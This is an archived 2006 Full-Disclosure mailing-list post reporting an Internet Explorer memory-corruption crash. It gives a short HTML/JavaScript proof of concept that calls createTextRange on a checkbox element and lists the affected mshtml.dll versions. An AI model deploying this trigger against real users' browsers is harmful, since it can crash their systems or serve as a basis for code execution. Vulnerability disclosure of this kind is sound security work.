[<prev] [next>] [day] [month] [year] [list]
Message-ID: <44211537.1070306@gecadtech.com>
Date: Wed, 22 Mar 2006 11:13:27 +0200
From: Stelian Ene <stelian.ene@...adtech.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: IE crash
I can't find any info on this delicious IE bug, but it seems to be publicly known:
<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>
It will badly access a (virtual?) pointer table, making EIP to jump at a random
address. This has various effects on the system I've tested with, including
crashing. It works on these versions of mshtml.dll:
XP SP2: 6.0.2900.2802 - latest
WS2003: 6.0.3790.0
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists